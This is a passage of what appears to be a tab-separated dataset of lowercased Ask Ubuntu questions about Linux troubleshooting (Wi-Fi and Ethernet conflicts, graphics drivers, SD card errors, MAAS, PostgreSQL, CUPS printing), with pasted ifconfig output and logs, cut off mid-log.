as well as the pulse in ~/.config . still nothing . not sure what else to delete .
277830	wlan unplugs when ethernet connected	i own an hp probook 4510s energy star . i am connected over wifi to the internet with a broad-com bcm4312 using the b43 driver . i am trying to share my internet connection to a tp-link access point/client in order to connect more devices to the internet . the problem is that every time i connect the ethernet cable to my laptop , wifi , turns off and i cant use it while the ethernet cable is connected . my biggest problem is that i cant use wifi and ethernet at the same time . here is my network hardware and configuration 1st when ethernet unplugged : network : card-1 : broadcom bcm4312 802.11b/g lp-phy driver : b43-pci-bridge card-2 : marvell 88e8072 pci-e gigabit ethernet controller driver : sky2 eth0 link encap : ethernet hwaddr 18 : a9:05 : cd : ee:79 up broadcast multicast mtu:1500 metric:1 rx packets:1308 errors:0 dropped:0 overruns:0 frame:0 tx packets:1378 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:338312 ( 338.3 kb ) tx bytes:144517 ( 144.5 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1257 errors:0 dropped:0 overruns:0 frame:0 tx packets:1257 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:38807 ( 38.8 kb ) tx bytes:38807 ( 38.8 kb ) wlan0 link encap : ethernet hwaddr 90:4c : e5:4d:20:96 inet addr:192.168.1.16 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :924c : e5ff : fe4d:2096/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:407060 errors:0 dropped:7 overruns:0 frame:0 tx packets:355911 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:451806029 ( 451.8 mb ) tx bytes:42627691 ( 42.6 mb ) 2nd when ethernet plugged : network : card-1 : broadcom bcm4312 802.11b/g lp-phy driver : b43-pci-bridge card-2 : marvell 88e8072 pci-e gigabit ethernet controller driver : sky2 eth0 link encap : ethernet hwaddr 18 : a9:05 : cd : ee:79 inet addr:192.168.1.4 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :1aa9:5ff : fecd : ee79/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1423 errors:0 dropped:0 overruns:0 frame:0 tx packets:1713 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:346272 ( 346.2 kb ) tx bytes:206229 ( 206.2 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1905 errors:0 dropped:0 overruns:0 frame:0 tx packets:1905 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:59829 ( 59.8 kb ) tx bytes:59829 ( 59.8 kb ) please inform me if anything else is needed and i will post it as soon as possible . thank you and sorry for my english . peace
277833	fglrx vs open drivers - informations and temperature control	i have ubuntu 12.04.2 and kde . i have fglrx 13.1 latest drivers . sometimes i have freezes at starup , it 's very annoying , and i discovered it 's bug : http : //ati.cchtml.com/show_bug.cgi ? id=691 so maybe i should remove fglrx proprietary drivers and go back to mesa open drivers . the problem is : when i first tried open drivers my gpu was used to work at 70c째 ( 158 fahrenheit ) instead i have max 39c째 ( 102 fahrenheit ) with flgrx drivers . i think it 's about temperature and fan control . if i decide to remove fglrx i want to be sure that i will not have problems , so i 'd like to know : is there a way to have same very good temperatures ( like with fglrx drivers ) with open drivers ? is there a good updated ppa to have latest open drivers versions in order to keep them updated ? at this moment my plymouth works well with fglrx , is there any change i have to do to make it works with open drivers ? last question : do you think it 's a good idea to use open drivers ? my machine specs : gpu : msi/ati r6870 hawk cpu : i5-2500k sandy bridge motherboard : p8p67 pro thanks a lot .
277838	removing an ubuntu installation	i first had windwos 7 , then i installed ubuntu alongside and when my laptop starts i can choose between ubuntu and windows ( the ubuntu boot screen ) . now i have installed another ubuntu inside the windows 7 using virtual box . i want to remove that first ubuntu installation and free up its partiotion . can i do it without making any problems for the windows and boot screen ?
277841	after power.d error , wlan is extremly slow	iâm using ubuntu 12.10 with 3.5.0-26-generic kernel version . today a system error occurred and the only thing about the error code i can remember was something about power.d . since this error occurred , the wifi connection is extremely slow , but only in battery mode . after some research i found that : sudo iwconfig eth1 power off ... solves the problem , but only for the current session ; after a reboot the same error is still there . is there any other solution to fix this problem permanently ?
277843	installing ibm lotus symphony dictionaries	im having troubles finding the answer to my questions , even in the ibm lotus symphony website so if you can help me it would be great : ) how do i can install the spanish dictionary ? and where i can download it ?
277844	ubuntu not working with hdmi , windows 7 does work - intel hd 4000 display adapter	i just installed ubuntu 12.10 on an external hard drive and it is booting just fine . i have a dell latitude e6230 with an intenl hd graphics 4000 video display adapter . for some reason , when this laptop is connected to my tv via hdmi and i boot in windows 7 , everything comes up just peachy and i can watch movies on the tv . however , when i boot the laptop through the external hard drive and connect to the tv via hdmi in ubuntu 12.10 , i can not get the display to work on the tv . i will get `` ubuntu '' to come up temporarily , but then the tv just goes black when i select hdmi input source just like i did with windows connected . any ideas on how to troubleshoot/fix this ? it 's a shame that windows 7 works and ubuntu does n't with the hdmi ... i am very green with linux/ubuntu , so please be specific in your responses . thanks .
277845	what are the key combinations for alphabets ' ऋ ' and ' ॲ ' on hindi bolnagari keyboard layout ?	i am using hindi bolnagri as an alternate keyboard layout . i wanted to type ऋ and ॲ . is there any key combination like there is for क्ष ( kxs ) and ज्ञ ( jxy ) ? if not , can i do something to assign them at a third level . i know we can press shift + alt + u and then type 0972 for ॲ and 090b for ऋ , but it is a pain to do this . also note : i am very new to linux , so i am not familiar with things , so a step by step tutorial would be good for me .
277846	picture size fujitsu siemens amilo l	i have loaded ubuntu 12.04 on my old amilo laptop and everything seems ok except the picture is only one third the screen size . i have checked the display settings on the desktop and these show `` laptop 640x480 resolution and can not be changed . any suggestion out there as i have no idea where to find the answer .
277848	damaged sd card ( badly unmounted ? ) how to fix ?	first off i 'm using ubuntu 12.04 on a laptop with a built in card reader . i have a sandisk 8gig micro sd card that came with my htc desire hd phone . unfortunately i had mounted it to a windows computer at work via a usb cable attached to the phone and did n't `` safely remove hardware '' . this was not the first time i did n't `` safely remove '' it from windows and each time i accidentally did so , i had to restart my phone before the sd card was accessible again . it must have worn out something though because now my phone wo n't recognize the card at all and when i put it into my laptop 's card reader i get the following errors in /var/log/syslog apr 4 21:17:59 jesse-laptop kernel : [ 12665.532025 ] mmc0 : error -110 whilst initialising sd card apr 4 21:18:00 jesse-laptop kernel : [ 12667.192024 ] mmc0 : error -110 whilst initialising sd card apr 4 21:18:02 jesse-laptop kernel : [ 12668.860020 ] mmc0 : error -110 whilst initialising sd card apr 4 21:18:04 jesse-laptop kernel : [ 12670.532020 ] mmc0 : error -110 whilst initialising sd card i have googled this message but ca n't find anywhere that explains what it means . all of the posts regarding similar errors that i found are about getting card readers to work , but my card reader works perfectly when i insert a different sd card . apr 4 21:26:35 jesse-laptop kernel : [ 13182.192121 ] mmc0 : new sdhc card at address b368 apr 4 21:26:35 jesse-laptop kernel : [ 13182.195849 ] mmcblk0 : mmc0 : b368 29.8 gib apr 4 21:26:35 jesse-laptop kernel : [ 13182.197931 ] mmcblk0 : p1 so i know the problem is with the damaged card not the reader . the problem seems to be with initializing the card because it does n't appear under /dev/ anywhere i can find . when i insert a working sd card it appears as /dev/mmcblk0 & the partition is /dev/mmcblk0p1 . needless to say i ca n't format the card or run any recovery software until i can get it to appear as a device . edit : - i have discovered by looking at my syslog relevant parts available here that when i first inserted my card the error was different to what it is now . i do n't really understand any of these errors . i 'm guessing the card was left in a state of anticipating a transfer ( if that 's possible ) and it did n't receive it . now it ca n't be initialized ( whatever that actually means ) any help regarding what this error means and/or how to recover data from my sd card is very much appreciated . most of my important data was backed up but there was one note taking application ( on my phone ) that was n't and i 'd like very much to retrieve that data . p.s . both the working card and the damaged card are micro sd and i 'm using a card adapter to insert them into my computer . p.p.s . i 've uploaded an annotated version of my /var/log/syslog with just the relevant parts here and also the full syslog here
277854	ubuntu 12.04 login screen : go directly to user background , not via default	i know i 'm being rather picky here , but is there a way to configure lightdm so that when the login screen shows after boot it directly shows the selected user 's background , instead of first loading the default screen and then fading to the user 's background ? i 'm running ubuntu 12.04 with unity ( 3d ) and lightdm .
277860	`` mediatomb ui is disabled . check your configuration . '' what could i be forgetting ?	upon initial installation of mediatomb i receive the following message : mediatomb ui is disabled . check your configuration . what could i be missing on this configuration ?
277862	how do i properly install and configure mediatomb ?	how do i properly install and configure mediatomb ? is there an easier app that i should try instead ?
277863	applications close unexpectedly after updating to gnome 3.8	i am currently using ubuntu 12.10 installed on an acer machine . today i updated gnome to gnome 3.8 ( actually it shows gnome 3.7.90 ) . now the problem is it that some of my application are getting closed within 2-3 second after launching . i changed the session to unity , but even in unity i am facing the same problem .
277866	gpu lockup on nvidia geforce 8200m g	i have recently installed 12.04 lts on an old toshiba satellite a215 which works just fine . i am attempting to load ubuntu on an msi cr600 with a geforce 8200m g video controller ( i am trying to dump microsoft once and for all ) . i 've attempted to install both 12.04 and 12.10 , on disk ( 32 bit ) , failing before reaching the install screen each time . if i install , via usb , can i add the necessary drivers and other needed deb packages to the usb stick , prior to install ? i could download the necessary files thru my toshiba satellite a215 but i would ask for a bit of guidance , since i am fairly new to linux .
277873	mount webdav fails on reboot	i 've got a vhost running ubuntu 12.10. i installed davfs2 and edited my /etc/fstab file like the following : https : //somedomain.de/webdav.php/somefolder/ /mnt/s02 davfs defaults 0 0 now mounting this using mount -a works fine . also if i type reboot after connecting using ssh on my vhost as root user , my drive gets mounted correctly . but using the web-backend of my provider ( digitalocean ) and clicking `` reboot '' there , i get an error after my machine starts up : any ideas why this is happening and how to fix this ?
277874	maas web interface not reachable after new installation !	i have the following problem . i have 2 testservers and i want to configure one of them as maas server and the other as node . i downloaded the latest 12.10 and used the maas option during the installation process . after rebooting the apache2 is running but opening maas results in the following : internal server error the server encountered an internal error or misconfiguration and was unable to complete your request . please contact the server administrator , webmaster @ localhost and inform them of the time the error occurred , and anything you might have done that may have caused the error . more information about this error may be available in the server error log . machine is an old hp dl180 g3 that ran smoothly under 12.04.2 lts ! the following error appears in var/log/apache2/error.log [ thu apr 04 17:06:01 2013 ] [ error ] mod_wsgi ( pid=1929 ) : target wsgi script '/usr/share/maas/wsgi.py ' can not be loaded as python module . [ thu apr 04 17:06:01 2013 ] [ error ] mod_wsgi ( pid=1929 ) : exception occurred processing wsgi script '/usr/share/maas/wsgi.py ' . [ thu apr 04 17:06:01 2013 ] [ error ] traceback ( most recent call last ) : [ thu apr 04 17:06:01 2013 ] [ error ] file `` /usr/share/maas/wsgi.py '' , line 30 , in < module > [ thu apr 04 17:06:01 2013 ] [ error ] start_up ( ) [ thu apr 04 17:06:01 2013 ] [ error ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 59 , in start_up [ thu apr 04 17:06:01 2013 ] [ error ] inner_start_up ( ) [ thu apr 04 17:06:01 2013 ] [ error ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 81 , in inner_start_up [ thu apr 04 17:06:01 2013 ] [ error ] setup_maas_avahi_service ( ) [ thu apr 04 17:06:01 2013 ] [ error ] file `` /usr/lib/python2.7/dist-packages/maasserver/maasavahi.py '' , line 52 , in setup_maas_avahi_service [ thu apr 04 17:06:01 2013 ] [ error ] service.publish ( ) [ thu apr 04 17:06:01 2013 ] [ error ] file `` /usr/lib/python2.7/dist-packages/maasserver/maasavahi.py '' , line 44 , in publish [ thu apr 04 17:06:01 2013 ] [ error ] self.service.publish ( ) [ thu apr 04 17:06:01 2013 ] [ error ] file `` /usr/lib/python2.7/dist-packages/maasserver/zeroconfservice.py '' , line 46 , in publish [ thu apr 04 17:06:01 2013 ] [ error ] bus.get_object ( avahi.dbus_name , avahi.dbus_path_server ) , [ thu apr 04 17:06:01 2013 ] [ error ] file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object [ thu apr 04 17:06:01 2013 ] [ error ] follow_name_owner_changes=follow_name_owner_changes ) [ thu apr 04 17:06:01 2013 ] [ error ] file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ [ thu apr 04 17:06:01 2013 ] [ error ] self._named_service = conn.activate_name_owner ( bus_name ) [ thu apr 04 17:06:01 2013 ] [ error ] file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner [ thu apr 04 17:06:01 2013 ] [ error ] self.start_service_by_name ( bus_name ) [ thu apr 04 17:06:01 2013 ] [ error ] file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name [ thu apr 04 17:06:01 2013 ] [ error ] 'su ' , ( bus_name , flags ) ) ) [ thu apr 04 17:06:01 2013 ] [ error ] file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking [ thu apr 04 17:06:01 2013 ] [ error ] message , timeout ) [ thu apr 04 17:06:01 2013 ] [ error ] dbusexception : org.freedesktop.dbus.error.timedout : activation of org.freedesktop.avahi timed out [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] mod_wsgi ( pid=1928 ) : target wsgi script '/usr/share/maas/wsgi.py ' can not be loaded as python module . [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] mod_wsgi ( pid=1928 ) : exception occurred processing wsgi script '/usr/share/maas/wsgi.py ' . [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] traceback ( most recent call last ) : [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] file `` /usr/share/maas/wsgi.py '' , line 30 , in < module > [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] start_up ( ) [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 59 , in start_up [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] inner_start_up ( ) [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 81 , in inner_start_up [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] setup_maas_avahi_service ( ) [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] file `` /usr/lib/python2.7/dist-packages/maasserver/maasavahi.py '' , line 52 , in setup_maas_avahi_service [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] service.publish ( ) [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] file `` /usr/lib/python2.7/dist-packages/maasserver/maasavahi.py '' , line 44 , in publish [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] self.service.publish ( ) [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] file `` /usr/lib/python2.7/dist-packages/maasserver/zeroconfservice.py '' , line 46 , in publish [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] bus.get_object ( avahi.dbus_name , avahi.dbus_path_server ) , [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] follow_name_owner_changes=follow_name_owner_changes ) [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] self._named_service = conn.activate_name_owner ( bus_name ) [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 175 , in activate_name_owner [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] return self.get_name_owner ( bus_name ) [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 361 , in get_name_owner [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] 's ' , ( bus_name , ) , **keywords ) [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] message , timeout ) [ thu apr 04 17:06:05 2013 ] [ error ] [ client 10.6.22.121 ] dbusexception : org.freedesktop.dbus.error.namehasnoowner : could not get owner of name 'org.freedesktop.avahi ' : no such name i have not any clue what is going on here . any suggestions ?
277875	how to upgrade postgresql from 9.2.0 to 9.2.4	the title says it all . if i run sudo apt-get update and then sudo apt-get upgrade none of the postgresql packages get updated . while the psql version 9.2.0 is and the last update is 9.2.4 . am i missing something ?
277880	print job state always held ( empty print file )	i have been using the printer for a over a year but now , suddenly , i can not print anymore . all jobs that i send to the queue are held . trying use ubuntu 's cups printer configuration tool to resume the print job has absolutely no effect . restarting the cups service or rebooting does n't help either . running cancel -a does clear held jobs from the queue , but then all new jobs are held again . this is the output from cups error log : e [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] empty print file ! d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] the following messages were recorded from 17:18:38 to 17:18:38 d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] adding start banner page `` none '' . d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] adding end banner page `` none '' . d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] file of type application/pdf queued by `` user '' . d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] hold_until=0 d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] queued on `` dell-dell-2155cdn-color-mfp '' by `` user '' . d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] job-sheets=none , none d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] argv [ 0 ] = '' dell-dell-2155cdn-color-mfp '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] argv [ 1 ] = '' 66 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] argv [ 2 ] = '' user '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] argv [ 3 ] = '' https : //mail-attachment ... .7xxxxxxxxx '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] argv [ 4 ] = '' 1 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] argv [ 5 ] = '' dlcolordensityyellowmid=0 dldocumenttype=normal dlcolordensitymagentamid=0 dlcolormode=color nodlskip dlcolordensitymagentahigh=0 duplex=none dlcolordensityyellowhigh=0 number-up=1 pagesize=a4 dlcolordensityblacklow=0 dlscreen2=auto nodlturnpage inputslot=1sttray dlcolordensityblackhigh=0 dlcolordensitycyanlow=0 nodltonersaver dlcolordensityblackmid=0 dlsubpaperselection=policy0 mediatype=stationary dlcolordensitycyanmid=0 dlletterheadduplexmode=dupauto nodltrapping nodledgeenhance dlcolordensitycyanhigh=0 dldigitalfilter=off dlcolordensityyellowlow=0 dlcolordensitymagentalow=0 job-uuid=urn : uuid:22efe93f-5054-3fef-4cc0-0f340b449899 job-originating-host-name=localhost time-at-creation=1365088718 time-at-processing=1365088718 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] argv [ 6 ] = '' /var/spool/cups/d00066-001 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 0 ] = '' cups_cachedir=/var/cache/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 1 ] = '' cups_datadir=/usr/share/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 2 ] = '' cups_docroot=/usr/share/cups/doc-root '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 3 ] = '' cups_fontpath=/usr/share/cups/fonts '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 4 ] = '' cups_requestroot=/var/spool/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 5 ] = '' cups_serverbin=/usr/lib/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 6 ] = '' cups_serverroot=/etc/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 7 ] = '' cups_statedir=/var/run/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 8 ] = '' home=/var/spool/cups/tmp '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 9 ] = '' path=/usr/lib/cups/filter : /usr/bin : /usr/sbin : /bin : /usr/bin '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 10 ] = '' server_admin=root @ localhost '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 11 ] = '' software=cups/1.5.0 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 12 ] = '' tmpdir=/var/spool/cups/tmp '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 13 ] = '' user=root '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 14 ] = '' cups_server=/var/run/cups/cups.sock '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 15 ] = '' cups_encryption=ifrequested '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 16 ] = '' ipp_port=631 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 17 ] = '' charset=utf-8 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 18 ] = '' lang=en_us.utf-8 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 19 ] = '' ppd=/etc/cups/ppd/dell-dell-2155cdn-color-mfp.ppd '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 20 ] = '' rip_max_cache=128m '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 21 ] = '' content_type=application/pdf '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 22 ] = '' device_uri=dnssd : //dell % 202155cdn % 20color % 20mfp % 20 ( a5 % 3a45 % 3afa ) ._ipp._tcp.local/ '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 23 ] = '' printer_info=dell dell 2155cdn color mfp '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 24 ] = '' printer_location=corridor '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 25 ] = '' printer=dell-dell-2155cdn-color-mfp '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 26 ] = '' printer_state_reasons=none '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 27 ] = '' cups_filetype=document '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 28 ] = '' final_content_type=printer/dell-dell-2155cdn-color-mfp '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 29 ] = '' auth_i**** '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] started filter /usr/lib/cups/filter/pdftopdf ( pid 4137 ) d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] started filter /usr/lib/cups/filter/gstoraster ( pid 4138 ) d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] started filter /usr/lib/cups/filter/dell_2155_color_mfp/dlm_mf ( pid 4139 ) d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] started backend /usr/lib/cups/backend/dnssd ( pid 4140 ) d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] resolving `` dell 2155cdn color mfp ( a5:45 : fa ) ._ipp._tcp.local '' ... d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] state : +connecting-to-device d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] resolving `` dell 2155cdn color mfp ( a5:45 : fa ) '' , regtype= '' _ipp._tcp '' , domain= '' local. '' ... d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] ppd uses qualifier 'cmyk.stationary.600dpi' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] calling finddevicebyid ( dell-dell-2155cdn-color-mfp ) d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] failed to send : org.freedesktop.dbus.error.accessdenied : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.93 '' ( uid=7 pid=4138 comm= '' dell-dell-2155cdn-color-mfp 66 user https : //mail '' ) interface= '' org.freedesktop.colormanager '' member= '' finddevicebyid '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.colormanager '' ( uid=102 pid=1559 comm= '' /usr/lib/x86_64-linux-gnu/colord/colord `` ) d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] failed to get profile filename ! d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] no profiles specified in ppd d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] ghostscript command line : /usr/bin/gs -dquiet -dparanoidsafer -dnopause -dbatch -dnointerpolate -sdevice=cups -sstdout= % stderr -soutputfile= % stdout -r600x600 -ddevicewidthpoints=595 -ddeviceheightpoints=842 -dcupsbitspercolor=8 -dcupscolororder=0 -dcupscolorspace=1 -scupspagesizename=a4 -i/usr/share/cups/fonts -c -f -_ d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 0 ] = '' cups_cachedir=/var/cache/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 1 ] = '' cups_datadir=/usr/share/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 2 ] = '' cups_docroot=/usr/share/cups/doc-root '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 3 ] = '' cups_fontpath=/usr/share/cups/fonts '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 4 ] = '' cups_requestroot=/var/spool/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 5 ] = '' cups_serverbin=/usr/lib/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 6 ] = '' cups_serverroot=/etc/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 7 ] = '' cups_statedir=/var/run/cups '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 8 ] = '' home=/var/spool/cups/tmp '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 9 ] = '' path=/usr/lib/cups/filter : /usr/bin : /usr/sbin : /bin : /usr/bin '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 10 ] = '' server_admin=root @ localhost '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 11 ] = '' software=cups/1.5.0 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 12 ] = '' user=root '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 13 ] = '' cups_server=/var/run/cups/cups.sock '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 14 ] = '' cups_encryption=ifrequested '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 15 ] = '' ipp_port=631 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 16 ] = '' charset=utf-8 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 17 ] = '' lang=en_us.utf-8 '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 18 ] = '' ppd=/etc/cups/ppd/dell-dell-2155cdn-color-mfp.ppd '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 19 ] = '' rip_max_cache=128m '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 20 ] = '' content_type=application/pdf '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 21 ] = '' device_uri=dnssd : //dell % 202155cdn % 20color % 20mfp % 20 ( a5 % 3a45 % 3afa ) ._ipp._tcp.local/ '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 22 ] = '' printer_info=dell dell 2155cdn color mfp '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 23 ] = '' printer_location=corridor '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 24 ] = '' printer=dell-dell-2155cdn-color-mfp '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 25 ] = '' printer_state_reasons=none '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 26 ] = '' cups_filetype=document '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 27 ] = '' final_content_type=printer/dell-dell-2155cdn-color-mfp '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] envp [ 28 ] = '' auth_info_required=none '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] resolved as `` ipp : //192.168.1.50:631/ipp '' ... d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] state : -connecting-to-device , offline-report d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] executing backend `` /usr/lib/cups/backend/ipp '' ... d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] state : +connecting-to-device d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] looking up `` 192.168.1.50 '' ... d [ 